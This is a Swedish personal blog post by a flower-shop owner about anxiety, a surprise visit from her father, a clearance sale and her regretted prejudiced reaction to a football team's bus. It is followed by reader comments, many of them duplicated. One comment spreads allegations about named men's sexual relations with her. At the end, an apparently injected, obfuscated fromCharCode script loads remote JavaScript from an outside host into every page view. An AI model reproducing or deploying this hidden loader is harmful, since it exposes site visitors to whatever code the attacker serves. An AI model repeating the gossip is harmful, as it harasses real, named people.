Grattis Irak! Nyanlända flyktingar?! Förutfattade meningar! -Tack Pappa!

IMG_7221

Hej! Inatt har jag sovit mycket bättre. Fortfarande vaknat till och från, med ångest…. Men inte med panikångest! Skönt! 

Kanske för att jag tagit mitt beslut….. Kanske för att jag sakta men säkert börjar förlika mig. kanske för att jag är utmattad. Eller kanske för att jag hade en mycket bra kväll igår. Eller en kombination av allt.

När vi stängde butiken igår så föll regnet över oss. Jag var blöt ända in på trosorna! Ja, sa jag till personalen, tom vädergudarna vänder mig ryggen! Jag försöker att skoja och ha en viss ironi men framförallt självdistans till situationen. Utan en dos av daglig ganska rå humor hade detta varit outhärdligt!

Då när det känns som motigast, när jag var som tröttast efter en lååååång dag i butiken. Så dyker han upp. Från ingenstans. Min Pappa. <3 IMG_7211Pappa hade kört över 100 mil för att komma ner till mig. Det är kärlek det! <3

Vi har en väldigt speciell relation. Den har gått upp och ner som en bergodalbana. Men oavsett vart, eller vad vi har befunnit oss så har vi alltid vetat vart vi har varandra.  Det finns nog ingen som jag kan irritera mig mer på. Eller argumentera emot hårdare. Tjafsa mer med. Eller som faktiskt kan driva mig till vansinne emellanåt! Envisare människa får man leta efter!!!! PÅ alla plan!

Det mest ironiska är att jag är en kopia av min pappa, jag är minst lika envis, irriterande och störande som han! Våra likheter kan emellanåt bli en ordentlig frontalkrock. Han kan emellanåt be mig att lyssna ”Men snälla rara söta My Christine Martens Yngve, om du bara för EN gång skull kunde lyssna på mig”

Någonstans vid Christine, har han redan retat upp mig! -haha! Nu skrattar jag faktiskt, för det är verkligen så. Oavsett vad så när det väl gäller, då finns han där. 100 %. Vi vet vart vi har varandra. Lika eller inte, envisa eller inte. Det betyder mycket! <3

När han kom fram till butiken och dök upp oplanerat. Då bröt jag ihop igen, grinade som en 3-åring. Så ånga känslor! 

Han ville att vi skulle äta middag. Jag protesterade direkt. -Nä, pappa. jag kan inte äta, är inte hungrig, vill inte träffa folk osv…. Men jag lät mig övertalas och vi satt i timmar och pratade. Om allt. beslutet. Historia. Framtid. Ludvig. osv.

Jag kände mig ganska avslappnad när jag kom hem till min väninna och gick och la mig. Jag kunde somna ganska snabbt. En otroligt efterlängtad känsla….. -TACK Pappa <3 IMG_7205

När vi satt där på Hotel Skansen så dök det upp en buss, med polis eskort och en massa poliser.

-VAD HÄNDER!?!

Folk spelade, jublade och firade någonsin…. ? Det visade sig vara IRAKs fotbollslandslag som just firade vinsten över Kalmar FF. -Grattis Irak! fick vi ju trots allt säga då. Det mest pinsamma med situationen var att jag blev på helspänn när alla poliserna var med och jag bara på håll såg några människor med utländskt påbrå. Jag viskade till pappa:

”hjälp nu kommer det ett busslass med nyanlända flyktingar!”

Pappa,blev lite smått chockad över min spontana, panikartade reaktion. ”Men , My… har du inte liiiite förutfattade meningar nu?”

JO, det hade jag tydligen! Gud vad jag skämdes sekunderna efter över att jag överhuvudtaget hade tänkt som jag gjorde. Där ser man vad påverkad av allt man läser i tidningarna, hör genom nyheterna om diverse olika situationer med våldtäkter , och allt annat som cirkulerat i media sista året! Man blir påverkad, man får tyvärr lite förutfattade meningar. Eller jag får det iallfall. Men här skenade tankarna iväg liiiite för fort! Till mitt försvar så är jag på helspänn just nu, och nerverna ligger mer utanpå kroppen än där dom ska vara…. 

Det var inget drama här inte, bara glada fotbollsspelare som firade sin vinst med segerdans och annat. Lite roligt var att My’s Blommor bilen blev in-parkerad ett par timmar OCH att hela laget skrattade åt den rosa lilla bilen, och dessutom fotade sig framför den. Hmpf… jag hoppas att det var bilen dom tyckte var rolig och inte bilden på mig själv längst bak??! ( skratt) 

IMG_7231

Skönt med lite skratta varvat med tårarna igår! Idag är en ny dag. Vaknade strax efter 04:00, men låg kvar is ängen och vilade även om jag inte kunde somna om….

Nu är det dags att kavla upp ärmarna och fortsätta framåt!

 idag är det SISTA dagen med 70 % och lagerrrensing på My’s Blommor. Det ÄR utplockat då vi kört detta race sedan i torsdags.

Tusentals människor har köat, och handlat i butiken. 70%, det är verkligen ingenting! Trots denna anstormning under våran laggerrensing så finns det några go-bitar kvar. Både på trädgårdssidan och bland inredningen. För att inte tala om all plantjord, ko-skit och alla andra ”bra att ha” grejer.

Så ska du nån gång passa på att komma in i min fina butik, (som just för stunden är helt upp och ner vänd) Så är det idag. -Varmt välkommen! 

IMG_7088

Kramar / My Martens

 

50 Komentarer

 1. Vill bara egentligen skicka en STOOOR Kraam å önska dig en UNDERBAR dag med MASSOR av GLÄDJE & SKRATT ❤
  Hoppas att allt lugnar ner sig runt dig å du får njuta av dagarna & lilleman.
  Vilken underbar pappa.
  Kom ihåg att stanna upp mitt i allt å andas.
  Här & Nu.
  Tack för en UNDERBAR blogg.

 2. Hej.
  Tänkte stanna till och faktiskt lämna en kommentar.
  Du utelämnar dig själv totalt i oss främlingar händer och vi många av oss ja vi förblir gömda bakom inloggningsnamn och hemliga profiler.
  Jag har aldrig riktigt vetat varför man följer vissa bloggar känns ibland väldigt märkligt men ja jag bor väldigt nära mys blommor vet ju vem du är. Älskar programmet ensam mamma söker och där va du en säsong.
  Ville väl egentligen bara i allt näthat lämna en kram här.
  Du är vän med en del jag känner i min omgivning och vad jag hör så är du en jättetrevlig person.
  Jag hoppas innerligt att du hittar lugnet i själen. Glöden,lyckan,gnistan igen och kommer ur detta hemska mörker som du dras in i.
  Ville bara säga att du är riktigt stark,att kunna prata öppet om din ångest som så många runt om mig har.
  Igår va jag och mina barn inne i din butik, känns märkligt att veta allt om dig men aTT du vet ju inte alls vilka vi andra här ute är.
  När min son sprang runt och skrek och busade så orkade jag inte kolla och handla mera ?
  Men sköt om dig och hoppas du snart mår bättre verkligen <3 och att ditt val är att få ro i själen tillsammans med din son.
  För jag vet själv att det finns ingt som är mer viktigare än sina barn.inget inte karriär inte yta inte kroppsliga ideal,läppar och kläder och det där som jag själv givetvis ser på bloggar och ibland vill ha själv.
  Jag har mina barn varann vecka och jag suger ur varenda sekund med dem sedan jag blev separerad.
  Kram till dig från mig. Allt kommer att bli bra.
  Och du…ta hand om dig nu för det finns bara en my och din son behöver dig.
  /linda

 3. God morgon My!
  Jag är inte religiös, tror inte på Gud men orden i den här Psalmen är så fantastiskt fina.
  ”Du vet väl om att du är värdefull
  Att du är viktig här och nu
  Att du är älskad för din egen skull
  För ingen annan är som du
  Det finns alltför många som vill tala om
  Att du bör vara si och så
  Gud Fader själv, han accepterar dej ändå
  Och det kan du lita på
  Du vet väl om …
  Du passar in i själva skapelsen
  Det finns en uppgift just för dej
  Men du är fri att göra vad du vill med den
  Säga ja eller nej
  Du vet väl om …
  Önskar dig en fin dag/Mari

 4. Vill bara egentligen skicka en STOOOR Kraam å önska dig en UNDERBAR dag med MASSOR av GLÄDJE & SKRATT ❤
  Hoppas att allt lugnar ner sig runt dig å du får njuta av dagarna & lilleman.
  Vilken underbar pappa.
  Kom ihåg att stanna upp mitt i allt å andas.
  Här & Nu.
  Tack för en UNDERBAR blogg.

 5. Hej.
  Tänkte stanna till och faktiskt lämna en kommentar.
  Du utelämnar dig själv totalt i oss främlingar händer och vi många av oss ja vi förblir gömda bakom inloggningsnamn och hemliga profiler.
  Jag har aldrig riktigt vetat varför man följer vissa bloggar känns ibland väldigt märkligt men ja jag bor väldigt nära mys blommor vet ju vem du är. Älskar programmet ensam mamma söker och där va du en säsong.
  Ville väl egentligen bara i allt näthat lämna en kram här.
  Du är vän med en del jag känner i min omgivning och vad jag hör så är du en jättetrevlig person.
  Jag hoppas innerligt att du hittar lugnet i själen. Glöden,lyckan,gnistan igen och kommer ur detta hemska mörker som du dras in i.
  Ville bara säga att du är riktigt stark,att kunna prata öppet om din ångest som så många runt om mig har.
  Igår va jag och mina barn inne i din butik, känns märkligt att veta allt om dig men aTT du vet ju inte alls vilka vi andra här ute är.
  När min son sprang runt och skrek och busade så orkade jag inte kolla och handla mera 🙂
  Men sköt om dig och hoppas du snart mår bättre verkligen <3 och att ditt val är att få ro i själen tillsammans med din son.
  För jag vet själv att det finns ingt som är mer viktigare än sina barn.inget inte karriär inte yta inte kroppsliga ideal,läppar och kläder och det där som jag själv givetvis ser på bloggar och ibland vill ha själv.
  Jag har mina barn varann vecka och jag suger ur varenda sekund med dem sedan jag blev separerad.
  Kram till dig från mig. Allt kommer att bli bra.
  Och du…ta hand om dig nu för det finns bara en my och din son behöver dig.
  /linda

 6. Fint att din pappa stöttar o finns för dig! Gott att han kom ner. Kan tänka mig att det var välbehövligt att få tanka pappa-kraft. Att ha stöd från nära o kära är ju extra viktigt nu. Det känns som att du trots allt är vid gott mod o du håller ihop o är positiv. Det kommer att lugna sig o faktum är att iom att Beslutet är taget har ju en stor del av det tuffa jobbiga släppt. Livet med alla dess möjligheter breder ut sig. Kram på dig o tack för att du delar med av glimtar ur ditt liv. ❤️

 7. God morgon My!
  Jag är inte religiös, tror inte på Gud men orden i den här Psalmen är så fantastiskt fina.

  ”Du vet väl om att du är värdefull
  Att du är viktig här och nu
  Att du är älskad för din egen skull
  För ingen annan är som du

  Det finns alltför många som vill tala om
  Att du bör vara si och så
  Gud Fader själv, han accepterar dej ändå
  Och det kan du lita på

  Du vet väl om …

  Du passar in i själva skapelsen
  Det finns en uppgift just för dej
  Men du är fri att göra vad du vill med den
  Säga ja eller nej

  Du vet väl om …

  Önskar dig en fin dag/Mari

 8. Kära My, läser att du mår dåligt och känner med dig men utan att förminska dina problem- inte alls, kanske just en tanke på flyktingfamiljernas och barnens situation kan sätta dina egna problem i perspektiv. De har gått igenom så mycket. Vill önska dig lycka till och allt gott.

 9. Härlig din pappa är <3 tycker att du ser ändå positivt på livet o ser en framtid, trots att det är jobbigt just nu. Kram

 10. Fint att din pappa stöttar o finns för dig! Gott att han kom ner. Kan tänka mig att det var välbehövligt att få tanka pappa-kraft. Att ha stöd från nära o kära är ju extra viktigt nu. Det känns som att du trots allt är vid gott mod o du håller ihop o är positiv. Det kommer att lugna sig o faktum är att iom att Beslutet är taget har ju en stor del av det tuffa jobbiga släppt. Livet med alla dess möjligheter breder ut sig. Kram på dig o tack för att du delar med av glimtar ur ditt liv. ❤️

 11. Bra att din pappa körde 100 mil för att träffa enbart dig, det är bara ens närmaste som kan ge de bästa och klokaste och mest erfarna råden.
  My jag fattar inte varför inte något tv-bolag ännu har signat dig, du är snygg, ung, mogen, äkta och inte tillgjord, ansvarstagande, mycket omtyckt, du skulle passa perfekt som programledare eller tv-hallåa, du skulle få många flera ungdomar att se på tv-programmen, ungdomar vill ha lite unga programledare och framförallt lite nytt i rutan, förnyelse helt enkelt. Hoppas någon kanal snart signar dig.
  Så till tv4, varför inte ta in My i era helgprogram, och berätta om blommor och hur man kan plantera fint i sin trädgård, hur man sköter blommor m.m, många flera ungdomar skulle då börja titta på programmen.
  Hoppas du får en fin dag, väldigt söt och gullig hund du har.

 12. Kära My, läser att du mår dåligt och känner med dig men utan att förminska dina problem- inte alls, kanske just en tanke på flyktingfamiljernas och barnens situation kan sätta dina egna problem i perspektiv. De har gått igenom så mycket. Vill önska dig lycka till och allt gott.

 13. Härlig din pappa är <3 tycker att du ser ändå positivt på livet o ser en framtid, trots att det är jobbigt just nu. Kram

 14. Bra att din pappa körde 100 mil för att träffa enbart dig, det är bara ens närmaste som kan ge de bästa och klokaste och mest erfarna råden.

  My jag fattar inte varför inte något tv-bolag ännu har signat dig, du är snygg, ung, mogen, äkta och inte tillgjord, ansvarstagande, mycket omtyckt, du skulle passa perfekt som programledare eller tv-hallåa, du skulle få många flera ungdomar att se på tv-programmen, ungdomar vill ha lite unga programledare och framförallt lite nytt i rutan, förnyelse helt enkelt. Hoppas någon kanal snart signar dig.

  Så till tv4, varför inte ta in My i era helgprogram, och berätta om blommor och hur man kan plantera fint i sin trädgård, hur man sköter blommor m.m, många flera ungdomar skulle då börja titta på programmen.

  Hoppas du får en fin dag, väldigt söt och gullig hund du har.

 15. Härligt att se en ”kändisbloggare” visa foton på sej själv utan filter på kameran, blir bara så löjligt med sånt fejk, åtminstone för alla som vet hur ni verkligen ser ut i verkligheten! Bra My !!!

 16. Hej My!
  Forsätt kämpa.Livet går upp och ner…Ibland undrar man hur mycke man ska klara av..
  Så länge man har hälsan och sina barn,så klarar man mer än man tror.
  Fint av din pappa att komma och ”tvinga ut dig bland folk”,och finnas där.
  Så att Magdalena var på väg hem.Åk dit och älta,gråt.Hon har varit med om mycke,så hon om nån borde kunna va ett bra bollplank.
  Stå stabilt och sträck på dig!!!
  Styrka till dig!!!!Kram

  • Men herregud, vad vet du om Magdalena är ett passande bollplank för My??
   Finns inga som är mera lämpade att få stöttning av än sina allra näraste, Mys pappa är nog den som är mest lämpad att veta vad som är bäst för sin dotter, en förälder skulle aldrig svika, ej heller lämna några råd som inte är till det bästa för sitt barn, finns dessutom där för alltid, där är skillnaden.

 17. Härligt att se en ”kändisbloggare” visa foton på sej själv utan filter på kameran, blir bara så löjligt med sånt fejk, åtminstone för alla som vet hur ni verkligen ser ut i verkligheten! Bra My !!!

 18. En stor kram, allt kommer att ordna sig My! Har själv varit där du är. Livet blir inte alltid som planerat, men ibland blir det bra ändå!

 19. Hej My!
  Forsätt kämpa.Livet går upp och ner…Ibland undrar man hur mycke man ska klara av..
  Så länge man har hälsan och sina barn,så klarar man mer än man tror.
  Fint av din pappa att komma och ”tvinga ut dig bland folk”,och finnas där.
  Så att Magdalena var på väg hem.Åk dit och älta,gråt.Hon har varit med om mycke,så hon om nån borde kunna va ett bra bollplank.
  Stå stabilt och sträck på dig!!!
  Styrka till dig!!!!Kram

  • Men herregud, vad vet du om Magdalena är ett passande bollplank för My??

   Finns inga som är mera lämpade att få stöttning av än sina allra näraste, Mys pappa är nog den som är mest lämpad att veta vad som är bäst för sin dotter, en förälder skulle aldrig svika, ej heller lämna några råd som inte är till det bästa för sitt barn, finns dessutom där för alltid, där är skillnaden.

 20. En stor kram, allt kommer att ordna sig My! Har själv varit där du är. Livet blir inte alltid som planerat, men ibland blir det bra ändå!

 21. Önskar ingen att må dåligt, ha ångest och inte kunna sova men ” jag har lovat Er en ärlig blogg” snacket faller ganska platt när man vet hur det är….
  Den sk listan över män du legat med existerar och det vet du också men Michela tog bort den kommentaren , förmodligen av hänsyn till Magdalena oc Hanna…
  Att ha som något slags motto att ligga runt är naturligtvis din ensak men känns inte särskilt hälsosamt på många sätt.
  Kocken Pontus, festfixaren Johan P. Magnus H Martin M är bara några exempel, och självklart måste du neka i bloggen….
  Men det känns så otroligt falskt att du kör gråta ut stilen, urgulliga läsare som bryr sig och så är det cred och kramar som du inte riktigt förtjänar
  Sanningen kommer alltid fram ….
  Och det kan bli tuffare än att sälja butiken….

  • allvarligt??, vem orkar bry sig , om det nu stämmer, så är My vuxen och kan ta egna beslut,herrejissis blir helt slapp av din kommentar, Mvh Monica

  • Oj vilken kommenar…att den släpptes fram. Det var lite märkligt att my skrev om att det cirkulerar en lista eller listor, för det var kanske inte så många som hade sett kommentaren (listan) ändå, men sen blev det ju såklart skvaller om det, bättre att my varit tyst om det, att hon inte skrivit om det. Vadå ha som motto, fånigt skivet, och vika hon har legat med är ju hennes ensak…men det är nog bra att vara ärlig om det mesta för att kunna få ro i själen.

  • Petra! Så djävla lågt under bältet skrivet! Du är ju helt sjuk Petra! Vem i helvete bryr sig om vem My har legat med??!! Vi bloggläsare som följt Mys blogg länge struntar fullkomligt i sådana skriverier, dessutom, My är ju varken gift, sambo eller förlovad, vem fucking har att göra med vad hon gör??? Vem har med att göra med vad någon annan gör överhuvudtaget? Petra, förmodligen har du drabbats av den obotliga avundsjukan, i annat fall skriver man inte sådan här skit.
   Det enda glädjande är att du aldrig blir frisk, för avundsjukan går aldrig att bota, lev med det.

 22. Önskar ingen att må dåligt, ha ångest och inte kunna sova men ” jag har lovat Er en ärlig blogg” snacket faller ganska platt när man vet hur det är….
  Den sk listan över män du legat med existerar och det vet du också men Michela tog bort den kommentaren , förmodligen av hänsyn till Magdalena oc Hanna…
  Att ha som något slags motto att ligga runt är naturligtvis din ensak men känns inte särskilt hälsosamt på många sätt.
  Kocken Pontus, festfixaren Johan P. Magnus H Martin M är bara några exempel, och självklart måste du neka i bloggen….
  Men det känns så otroligt falskt att du kör gråta ut stilen, urgulliga läsare som bryr sig och så är det cred och kramar som du inte riktigt förtjänar
  Sanningen kommer alltid fram ….
  Och det kan bli tuffare än att sälja butiken….

  • allvarligt??, vem orkar bry sig , om det nu stämmer, så är My vuxen och kan ta egna beslut,herrejissis blir helt slapp av din kommentar, Mvh Monica

  • Oj vilken kommenar…att den släpptes fram. Det var lite märkligt att my skrev om att det cirkulerar en lista eller listor, för det var kanske inte så många som hade sett kommentaren (listan) ändå, men sen blev det ju såklart skvaller om det, bättre att my varit tyst om det, att hon inte skrivit om det. Vadå ha som motto, fånigt skivet, och vika hon har legat med är ju hennes ensak…men det är nog bra att vara ärlig om det mesta för att kunna få ro i själen.

  • Petra! Så djävla lågt under bältet skrivet! Du är ju helt sjuk Petra! Vem i helvete bryr sig om vem My har legat med??!! Vi bloggläsare som följt Mys blogg länge struntar fullkomligt i sådana skriverier, dessutom, My är ju varken gift, sambo eller förlovad, vem fucking har att göra med vad hon gör??? Vem har med att göra med vad någon annan gör överhuvudtaget? Petra, förmodligen har du drabbats av den obotliga avundsjukan, i annat fall skriver man inte sådan här skit.

   Det enda glädjande är att du aldrig blir frisk, för avundsjukan går aldrig att bota, lev med det.

 23. Har hela tiden haft på känn att ”gaphalsen” är din pappa,kul att det stämde. Han livade ju upp Jönköping för några år sedan.

 24. Har hela tiden haft på känn att ”gaphalsen” är din pappa,kul att det stämde. Han livade ju upp Jönköping för några år sedan.

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/